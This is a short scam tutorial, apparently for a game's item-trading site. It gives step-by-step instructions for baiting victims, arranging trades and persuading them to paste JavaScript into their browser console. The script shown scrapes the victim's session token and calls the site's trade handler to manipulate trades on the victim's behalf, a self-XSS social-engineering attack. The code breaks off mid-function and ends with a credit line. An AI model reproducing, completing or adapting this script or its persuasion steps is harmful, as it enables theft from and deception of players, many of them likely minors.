1. Baiting: Tell them UUC is back ask if they wanna learn add them on kord
2. After that tell them new need 2 outbound trades of the same item then
3. Send them a trade for the items u want
4. Once youve Convinced them u gotta use a manual api method on them
5. Make them go click F12 aka inspect and they got to go to console and paste this 

function POST(){
$.ajax({
url : "/My/Money.aspx/GetMyItemTrades",
type : "POST",
data : '{"statustype":"inbound","startindex":0}',
contentType : "application/json; charset=UTF-8",
success : function(Data){
var Base = jQuery.parseJSON(jQuery.parseJSON(Data.d).Data[0])
var TradeId = Base["TRADE ID HERE "]
var Partner = Base["USER’S ID"]
var Token = ""
$.get("/My/Money.aspx",function(Data){
Token = Data.match(/setToken(\W(.+)\W);/)[2].replace(/'/g,"")
Token = Token.replace("+","%2B").replace("/","%2F")
}).always(function(){
$.post("/Trade/TradeHandler.ashx?token=" + Token,{TradeID : TradeId,cmd : "pull"},function(Data){
var Base = jQuery.parseJSON(Data.data).AgentOfferList
var Other = 1
if (Number(Base[0].AgentID) == Number(Partner)){
Other = 0 
CREDITS DEVI SERVER
﻿